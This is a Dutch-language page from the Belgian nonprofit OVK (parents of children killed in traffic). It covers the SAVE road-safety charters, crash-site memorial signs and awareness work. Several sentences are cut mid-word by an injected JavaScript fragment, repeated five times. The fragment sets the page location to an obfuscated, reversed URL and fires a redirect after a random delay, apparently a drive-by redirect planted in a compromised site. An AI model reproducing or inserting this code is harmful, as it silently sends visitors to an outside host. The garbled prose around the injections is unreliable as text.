Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Andere SAVE-acties

Ouders van Verongelukte Kinderen-SAVE vzw onderneemt een aantal initiatieven die op sensibilisatie en preventie zijn gericht.

Deze initiatieven worden gebundeld onder de noemer SAVE

Samen Actief voor een VEilig verkeer’ – ‘SAuvons la Vie de nos Enfants’.

Het SAVE-charter voor individuele weggebruikers

In 1995 ontwierp OVK een verkeersveiligheidscharter voor weggebruikers, het SAVE-charter. Hierin wordt een reeks van attitudes opgenomen die voor het grootste deel door de wegcode zijn voorzien en die ertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe bijdragen dat kinderen en jongeren minder gevaar lopen in het verkeer. Het charter werd vernieuwd eind 2007 en opnieuw herzien in 2010.

Wie zich als gewone weggebruiker actief wil inzetten voor veiliger verkeer, kan het SAVE-charter ondertekenen.

Voor meer info, klik hier

SAVE-charter weggebruikers

Het is naar analogie met dit SAVE-charter voor weggebruikers dat het SAVE-charter Steden & Gemeenten in 2011 ontwikkeld werd.

SAVE-herdenkingsborden op de plaats van een ongeval

Een tweede emanatie van SAVE werd opgestart in 1996: het plaatsen van SAVE-borden op de plaats van een ongeval. Op vraag van de betrokken OVK ouders kan op de plaats van het ongeval van hun kind een SAVE-bord geplaatst worden met vermelding van de naam en leeftijd van het jonge verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer.

Dit bord heeft een drievoudig doel: het is (I) een blijk van solidariteit met het getroffen gezin, (II) een gedenkteken ter nagedachtenis van het slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer en (III) een blijvende herinnering aan de buitenwereld aan de verantwoordelijkheid die we allen dragen op het gebied van verkeersveiligheid.

OVK plaatste momenteel ongeveer 250 SAVE-borden, waarvan een 180-tal in Vlaanderen. Een overzichtskaart van alle SAVE-herdenkingsborden in België vindt u hier.

Anonieme SAVE-borden 

In 2004 volgden de “anonieme” SAVE-borden die door het Vlaams Gewest op gevaarlijke punten geplaatst werden, in praktijk vaak voor de flitspalen. Deze hebben als doel de weggebruiker er op te wijzen dat op dat bepaald punt vaak onveilig gereden wordt en om hen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot voorzichtigheid aan te manen.

Andere

In het kader van sensibilisatie gaat OVK ook vaak in op vraag van verschillende soorten organisaties om met een stand te staan op evenementen en beurzen.

Ook geven de OVK-leden getuigenissen in scholen (i.s.m. Getuigen Onderweg van Rondpunt vzw), in bedrijven en voor de politie.

Daarnaast ondersteunt OVK ook de theatermonoloog Flits! en het boek Zonder Afscheid van Wim Geysen. Dit boek is al een tweede versie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe (2014) en werd ondertussen deels verfilmd onder de noemer ‘Afscheid nemen bestaat niet’ en is beschikbaar op DVD.

© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be